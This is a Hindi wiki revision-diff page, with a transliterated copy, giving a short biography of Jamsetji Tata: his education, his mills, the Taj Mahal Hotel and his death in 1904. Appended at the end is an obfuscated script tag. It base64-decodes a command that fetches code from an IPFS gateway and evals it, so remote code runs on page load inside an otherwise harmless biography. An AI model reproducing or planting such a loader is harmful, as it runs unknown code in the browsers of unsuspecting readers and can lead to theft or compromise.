Difference between revisions of "जमशेद जी टाटा"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - " सन " to " सन् ")
Line 39: Line 39:
 
|अद्यतन={{अद्यतन|11:58, 25 नवम्बर 2011 (IST)}}
 
|अद्यतन={{अद्यतन|11:58, 25 नवम्बर 2011 (IST)}}
 
}}
 
}}
'''जमशेदजी नुसीरवानजी टाटा''' (जन्म- [[3 मार्च]], 1839; मृत्यु- [[19 मई]], 1904) वर्तमान में [[भारत]] के विश्वप्रसिद्ध औद्योगिक घराने टाटा समूह के संस्थापक थे।  
+
 
==जीवन परिचय==
+
'''जमशेदजी नुसीरवानजी टाटा''' (जन्म- [[3 मार्च]], 1839, [[गुजरात]]; मृत्यु- [[19 मई]], [[1904]], [[जर्मनी]]) [[भारत]] के विश्वप्रसिद्ध औद्योगिक घराने "टाटा समूह" के संस्थापक थे। भारतीय औद्योगिक क्षेत्र में जमशेदजी ने जो योगदान दिया, वह असाधारण और बहुत ही महत्त्वपूर्ण माना जाता है। उन्होंने भारतीय औद्योगिक विकास का मार्ग ऐसे समय में प्रशस्त किया था, जब उस दिशा में केवल यूरोपीय, विशेष रूप से [[अंग्रेज़]] ही कुशल समझे जाते थे। [[इंग्लैण्ड]] की अपनी प्रथम यात्रा से लौटकर जमशेदजी टाटा ने चिंचपोकली के एक तेल मिल को कताई-बुनाई मिल में परिवर्तित करके औद्योगिक जीवन का सूत्रपात किया था। टाटा साम्राज्य के जनक जमशेदजी के कार्य आज भी लोगों को प्रेरित एवं विस्मित करते हैं। भविष्य को भाँपने की अद्भुत क्षमता के बल पर ही उन्होंने एक स्वनिर्भर औद्योगिक भारत का सपना देखा था। उन्होंने वैज्ञानिक एवं तकनीकी शिक्षा के लिए बेहतरीन सुविधाएँ उपलब्ध करायीं और राष्ट्र को महाशक्ति बनने का मार्ग दिखाया।
जमशेदजी टाटा जन्म सन् 1839 में [[गुजरात]] के एक छोटे से कस्बे नवसेरी में हुआ था। उनके पिता जी का नाम नुसीरवानजी था व उनकी माता जी का नाम जीवनबाई टाटा था। पारसी पादरियों के अपने ख़ानदान में नुसीरवानजी पहले व्यवसायी थे। भाग्य उन्हें [[बंबई]] ले आया जहाँ उन्होंने व्यवसाय (धंधे) में क़दम रखा। जमशेदजी 14 साल की नाज़ुक उम्र में ही उनका साथ देने लगे।
+
==जन्म तथा शिक्षा==
;शिक्षा
+
जमशेदजी टाटा का जन्म सन 1839 में [[गुजरात]] के एक छोटे-से कस्बे नवसेरी में हुआ था। उनका परिवार [[पारसी]] पुजारियों का था। उनके [[पिता]] का नाम नुसीरवानजी तथा [[माता]] का नाम जीवनबाई टाटा था। पारसी पादरियों के अपने ख़ानदान में नुसीरवानजी पहले व्यवसायी व्यक्ति थे। जमशेदजी का भाग्य उन्हें मात्र चौदह वर्ष की अल्पायु में ही पिता के साथ [[बंबई]] (वर्तमान [[मुम्बई]]) ले आया। यहाँ उन्होंने व्यवसाय (धंधे) में क़दम रखा। जमशेदजी अपनी छोटी नाज़ुक उम्र में ही पिता का साथ देने लगे थे। सत्रह वर्ष की आयु में जमशेदजी ने 'एलफ़िंसटन कॉलेज', मुम्बई में प्रवेश ले लिया। इसी कॉलेज से वे दो वर्ष बाद 'ग्रीन स्कॉलर' के रूप में उत्तीर्ण हुए। तत्कालीन समय में यह उपाधि ग्रेजुएट के बराबर हुआ करती थी।<ref>{{cite web |url= http://ranchiexpress.com/145884|title=राष्ट्र निर्माण के प्रेणेताओं में अग्रणी थे- जमशेदजी टाटा|accessmonthday= 2 मार्च|accessyear= 2013|last= |first= |authorlink= |format= |publisher= |language=हिन्दी}}</ref>
जमशेदजी ने एल्फिंस्टन कॉलेज में प्रवेश लिया और अपनी पढ़ाई के दौरान ही उन्होंने हीरा बाई दबू से विवाह कर लिया। वे 1858 में स्नातक हुए और अपने पिता के व्यवसाय से पूरी तरह जुड़ गए।
 
 
==व्यवसाय की शुरुआत==
 
==व्यवसाय की शुरुआत==
 
वह दौर बहुत कठिन था। [[अंग्रेज़]] अत्यंत बर्बरता से 1857 कि क्रान्ति को कुचलने में सफल हुए थे। 29 साल कि उम्र तक जमशेदजी अपने पिता जी के साथ ही काम करते रहे। 1868 में उन्होंने 21000 रुपयों के साथ अपना खुद का व्यवसाय शुरू किया। सबसे पहले उन्होंने एक दिवालिया तेल कारख़ाना ख़रीदा और उसे एक रुई के कारखाने में तब्दील कर दिया और उसका नाम बदल कर रखा-एलेक्जेंडर कर दिया। दो साल बाद उन्होंने इसे ख़ासे मुनाफे के साथ बेच दिया। इस पैसे के साथ उन्होंने [[नागपुर]] में 1874 में एक रुई का कारख़ाना लगाया। [[महारानी विक्टोरिया]] ने उन्ही दिनों [[भारत]] की रानी का खिताब हासिल किया था और जमशेदजी ने भी वक़्त को समझते हुए कारखाने का नाम इम्प्रेस्स मिल रखा। जमशेदजी एक अलग ही व्यक्तित्व के मालिक थे। उन्होंने ना केवल कपड़ा बनाने के नए नए तरीक़े ही अपनाए बल्कि अपने कारखाने में काम करने वाले श्रमिकों का भी खूब ध्यान रखा। उनके भले के लिए जमशेदजी ने अनेक नई व बेहतर श्रम-नीतियाँ अपनाई। इस नज़र से भी वे अपने समय से कहीँ आगे थे। सफलता को कभी केवल अपनी जागीर नहीं समझा, बल्कि उनके लिए उनकी सफलता उन सब की थी जो उनके लिए काम करते थे। जमशेद जी के अनेक राष्ट्रवादी और क्रांतिकारी नेताओं से नजदीकी संबंध थे, इन में प्रमुख थे, [[दादाभाई नौरोजी]] और [[फिरोजशाह मेहता]]। जमशेदजी पर और उनकी सोच पर इनका काफ़ी प्रभाव था। उनका मानना था कि आर्थिक स्वतंत्रता ही राजनीतिक स्वतंत्रता का आधार है। जमशेद जी के दिमाग में तीन बडे विचार थे -  
 
वह दौर बहुत कठिन था। [[अंग्रेज़]] अत्यंत बर्बरता से 1857 कि क्रान्ति को कुचलने में सफल हुए थे। 29 साल कि उम्र तक जमशेदजी अपने पिता जी के साथ ही काम करते रहे। 1868 में उन्होंने 21000 रुपयों के साथ अपना खुद का व्यवसाय शुरू किया। सबसे पहले उन्होंने एक दिवालिया तेल कारख़ाना ख़रीदा और उसे एक रुई के कारखाने में तब्दील कर दिया और उसका नाम बदल कर रखा-एलेक्जेंडर कर दिया। दो साल बाद उन्होंने इसे ख़ासे मुनाफे के साथ बेच दिया। इस पैसे के साथ उन्होंने [[नागपुर]] में 1874 में एक रुई का कारख़ाना लगाया। [[महारानी विक्टोरिया]] ने उन्ही दिनों [[भारत]] की रानी का खिताब हासिल किया था और जमशेदजी ने भी वक़्त को समझते हुए कारखाने का नाम इम्प्रेस्स मिल रखा। जमशेदजी एक अलग ही व्यक्तित्व के मालिक थे। उन्होंने ना केवल कपड़ा बनाने के नए नए तरीक़े ही अपनाए बल्कि अपने कारखाने में काम करने वाले श्रमिकों का भी खूब ध्यान रखा। उनके भले के लिए जमशेदजी ने अनेक नई व बेहतर श्रम-नीतियाँ अपनाई। इस नज़र से भी वे अपने समय से कहीँ आगे थे। सफलता को कभी केवल अपनी जागीर नहीं समझा, बल्कि उनके लिए उनकी सफलता उन सब की थी जो उनके लिए काम करते थे। जमशेद जी के अनेक राष्ट्रवादी और क्रांतिकारी नेताओं से नजदीकी संबंध थे, इन में प्रमुख थे, [[दादाभाई नौरोजी]] और [[फिरोजशाह मेहता]]। जमशेदजी पर और उनकी सोच पर इनका काफ़ी प्रभाव था। उनका मानना था कि आर्थिक स्वतंत्रता ही राजनीतिक स्वतंत्रता का आधार है। जमशेद जी के दिमाग में तीन बडे विचार थे -  
Line 55: Line 54:
 
जमशेद जी टाटा ने 19 मई 1904 में [[जर्मनी]] में उन्होंने अपनी आख़िरी सांस ली ।<ref>{{cite web |url=http://www.pressnote.in/profile---jamshed-ji-tata_92339.html |title=जमशेद जी टाटा |accessmonthday=[[4 अप्रॅल]] |accessyear=[[2011]] |last= |first= |authorlink= |format= |publisher=प्रेसनोट |language=[[हिन्दी]] }}</ref>
 
जमशेद जी टाटा ने 19 मई 1904 में [[जर्मनी]] में उन्होंने अपनी आख़िरी सांस ली ।<ref>{{cite web |url=http://www.pressnote.in/profile---jamshed-ji-tata_92339.html |title=जमशेद जी टाटा |accessmonthday=[[4 अप्रॅल]] |accessyear=[[2011]] |last= |first= |authorlink= |format= |publisher=प्रेसनोट |language=[[हिन्दी]] }}</ref>
  
{{प्रचार}}
+
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक=|पूर्णता=|शोध=}}
{{लेख प्रगति
 
|आधार=
 
|प्रारम्भिक=प्रारम्भिक1
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
{{संदर्भ ग्रंथ}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{उद्योगपति और व्यापारी}}
 
{{उद्योगपति और व्यापारी}}
[[Category:उद्योगपति और व्यापारी]]
+
[[Category:उद्योगपति और व्यापारी]][[Category:प्रसिद्ध व्यक्तित्व]] [[Category:प्रसिद्ध व्यक्तित्व कोश]][[Category:चरित कोश]]
[[Category:प्रसिद्ध व्यक्तित्व]]  
 
[[Category:प्रसिद्ध व्यक्तित्व कोश]][[Category:चरित कोश]]
 
 
__INDEX__
 
__INDEX__
 
__NOTOC__
 
__NOTOC__

Revision as of 07:45, 2 March 2013

jamashed ji tata
poora nam jamashedaji nusiravanaji tata
janm 3 march, 1839
janm bhoomi navaseri kasba, gujarat
mrityu 19 mee, 1904
mrityu sthan jarmani
pati/patni hira baee daboo
karm bhoomi mumbee
karm-kshetr udyogapati
prasiddhi mumbee ki shan taj mahal hotal ka nirman kiya.
nagarikata bharatiy
any janakari jamashedaji tata vartaman mean bharat ke vishvaprasiddh audyogik gharane tata samooh ke sansthapak the.
adyatan‎

jamashedaji nusiravanaji tata (janm- 3 march, 1839, gujarat; mrityu- 19 mee, 1904, jarmani) bharat ke vishvaprasiddh audyogik gharane "tata samooh" ke sansthapak the. bharatiy audyogik kshetr mean jamashedaji ne jo yogadan diya, vah asadharan aur bahut hi mahattvapoorn mana jata hai. unhoanne bharatiy audyogik vikas ka marg aise samay mean prashast kiya tha, jab us disha mean keval yooropiy, vishesh roop se aangrez hi kushal samajhe jate the. ianglaind ki apani pratham yatra se lautakar jamashedaji tata ne chianchapokali ke ek tel mil ko kataee-bunaee mil mean parivartit karake audyogik jivan ka sootrapat kiya tha. tata samrajy ke janak jamashedaji ke kary aj bhi logoan ko prerit evan vismit karate haian. bhavishy ko bhaanpane ki adbhut kshamata ke bal par hi unhoanne ek svanirbhar audyogik bharat ka sapana dekha tha. unhoanne vaijnanik evan takaniki shiksha ke lie behatarin suvidhaean upalabdh karayian aur rashtr ko mahashakti banane ka marg dikhaya.

janm tatha shiksha

jamashedaji tata ka janm san 1839 mean gujarat ke ek chhote-se kasbe navaseri mean hua tha. unaka parivar parasi pujariyoan ka tha. unake pita ka nam nusiravanaji tatha mata ka nam jivanabaee tata tha. parasi padariyoan ke apane khanadan mean nusiravanaji pahale vyavasayi vyakti the. jamashedaji ka bhagy unhean matr chaudah varsh ki alpayu mean hi pita ke sath banbee (vartaman mumbee) le aya. yahaan unhoanne vyavasay (dhandhe) mean qadam rakha. jamashedaji apani chhoti nazuk umr mean hi pita ka sath dene lage the. satrah varsh ki ayu mean jamashedaji ne 'elafiansatan k aaulej', mumbee mean pravesh le liya. isi k aaulej se ve do varsh bad 'grin sk aaular' ke roop mean uttirn hue. tatkalin samay mean yah upadhi grejuet ke barabar hua karati thi.[1]

vyavasay ki shuruat

vah daur bahut kathin tha. aangrez atyant barbarata se 1857 ki kranti ko kuchalane mean saphal hue the. 29 sal ki umr tak jamashedaji apane pita ji ke sath hi kam karate rahe. 1868 mean unhoanne 21000 rupayoan ke sath apana khud ka vyavasay shuroo kiya. sabase pahale unhoanne ek divaliya tel karakhana kharida aur use ek ruee ke karakhane mean tabdil kar diya aur usaka nam badal kar rakha-elekjeandar kar diya. do sal bad unhoanne ise khase munaphe ke sath bech diya. is paise ke sath unhoanne nagapur mean 1874 mean ek ruee ka karakhana lagaya. maharani viktoriya ne unhi dinoan bharat ki rani ka khitab hasil kiya tha aur jamashedaji ne bhi vaqt ko samajhate hue karakhane ka nam impress mil rakha. jamashedaji ek alag hi vyaktitv ke malik the. unhoanne na keval kap da banane ke ne ne tariqe hi apanae balki apane karakhane mean kam karane vale shramikoan ka bhi khoob dhyan rakha. unake bhale ke lie jamashedaji ne anek nee v behatar shram-nitiyaan apanaee. is nazar se bhi ve apane samay se kahian age the. saphalata ko kabhi keval apani jagir nahian samajha, balki unake lie unaki saphalata un sab ki thi jo unake lie kam karate the. jamashed ji ke anek rashtravadi aur kraantikari netaoan se najadiki sanbandh the, in mean pramukh the, dadabhaee nauroji aur phirojashah mehata. jamashedaji par aur unaki soch par inaka kafi prabhav tha. unaka manana tha ki arthik svatantrata hi rajanitik svatantrata ka adhar hai. jamashed ji ke dimag mean tin bade vichar the -

  1. apani loha v stil kanpani kholana
  2. ek jagat prasiddh adhyayan keandr sthapit karana
  3. ek jalavidyut pariyojana (Hydro-electric plant) lagana .

durbhagyavash unake jivan kal mean tinoan mean se koee bhi sapana poora na ho saka. par ve bij to bo hi chuke the, ek aisa bij jisaki j dean unaki ane vali pidhi ne anek deshoan mean phailayian.

nirman

mumbee ka prasiddh taj mahal hotal mumbee ki shan mana jata hai jisaka nirman jamashedaji tata ne disanbar 1903 mean 4,21,00,000 rupaye ke shahi kharch ke dauran kiya tha. isame bhi unhoanne apani rashtravadi soch ko dikhaya tha. un dinoan sthaniy bharatiyoan ko behatarin yooropiyan hotaloan mean ghusane nahian diya jata tha. tajamahal hotal is damanakari niti ka karara javab tha .

mrityu

jamashed ji tata ne 19 mee 1904 mean jarmani mean unhoanne apani akhiri saans li .[2]


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. rashtr nirman ke prenetaoan mean agrani the- jamashedaji tata (hindi). . abhigaman tithi: 2 march, 2013.
  2. jamashed ji tata (hindi) presanot. abhigaman tithi: 4 aprॅl, 2011.

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>